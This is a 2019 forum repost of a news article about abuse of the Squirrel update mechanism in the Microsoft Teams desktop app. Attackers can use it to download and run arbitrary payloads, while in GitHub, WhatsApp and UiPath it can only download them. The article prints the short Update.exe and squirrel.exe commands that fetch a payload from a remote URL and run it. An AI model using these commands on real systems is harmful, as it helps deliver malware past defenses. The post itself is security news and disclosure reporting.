Windows 10 News and info | Forum
August 05, 2020, Loading... *
Welcome, Guest. Please login or register.

Login with username, password and session length
News: This is a clean Ad-free Forum and protected by StopForumSpam, Project Honeypot, Botscout and AbuseIPDB | This forum does not use audio ads, popups, or other annoyances. New member registration currently disabled.
  Website   Home   Windows 8 Website GDPR Help Login Register  
By continuing to use the site or forum, you agree to the use of cookies, find out more by reading our GDPR policy.
Pages: [1]
Share this topic on Del.icio.usShare this topic on DiggShare this topic on FacebookShare this topic on GoogleShare this topic on MySpaceShare this topic on RedditShare this topic on StumbleUponShare this topic on TechnoratiShare this topic on TwitterShare this topic on YahooShare this topic on Google buzz
Author Topic: Microsoft Teams Can Be Used to Download and Run Malicious Packages  (Read 183 times)
Hero Member
Online Online

Gender: Male
United States United States

Posts: 31640

I Do Windows

WWW Email
« on: June 29, 2019, 04:26:34 PM »

The update mechanism as it is currently implemented in Microsoft Teams desktop app allows downloading and executing arbitrary files on the system.

The same issue affects GitHub, WhatsApp, and UiPath software for desktop computers but it can be used only to download a payload.

These applications rely on the open source Squirrel project to manage installation and updating routines, which uses NuGet package manager to create the necessary files.

Multiple security researchers discovered that using the 'update' command for a vulnerable application it is possible to execute an arbitrary binary in the context of the current user. The same goes for 'squirrel.exe.'

With Microsoft Teams, a payload is added to its folder and executed automatically using either of the following commands:

Update.exe --update [url to payload]

squirrel.exe --update [url to payload]

The commands can be used with other arguments, including 'download,' which enables retrieving the payload in the form of a NuGet package from a remote location.

Update.exe --download [url to payload]

squirrel.exe --download [url to payload]

The same method is valid for "squirrel.exe," which is also part of the Microsoft Teams installation package. Both executables are now part of the Living Off The Land Binaries and Scripts (LOLBAS) database on GitHub, directly accessible here and here.

Reverse engineer Reegun Richard tested the issue on Microsoft Teams and reported it to the company on June 4. The application continues to be vulnerable at this point as Microsoft informed the researcher that the fix would come in a future release of the software.

Trying to replicate the effect with GitHub, and WhatsApp, and UiPath did not achieve execution for the payload and only downloading it from a remote server was possible.

"In this scenario, an attacker can use this method to mask the payload download," which is still useful for an adversary, Richard told BleepingComputer.

Rooting for the blue team, Richard wanted to keep the details private until Microsoft Teams made the details public before Microsoft released a patch.

Another researcher playing for the red team, Mr. Un1k0d34 of the RingZer0 Team, had found the issue and published the details.

In a thread on Twitter, Richard explains the process of finding the bug and its root. He started from previous research published in late March by Hexacorn, which focused on living-of-the-land binaries (lolbins) in Electron-based apps.

Richard also made a video demonstrating how an attacker could use Microsoft Teams to get a shell on the target computer. Full details about exploiting this issue are available in a blog post from the researcher.

Microsoft Teams is intended for business use as it is a step up from Skype for Business. It is an alternative to Slack and offers unified communications with video meeting, file storage, and collaboration features. Its supports extensions for integration with products from other developers.

« Last Edit: June 29, 2019, 04:36:57 PM by javajolt » Logged

Pages: [1]
Jump to:  

Powered by SMF 1.1.21 | SMF © 2017, Simple Machines

Google visited last this page July 24, 2020, 10:15:27 AM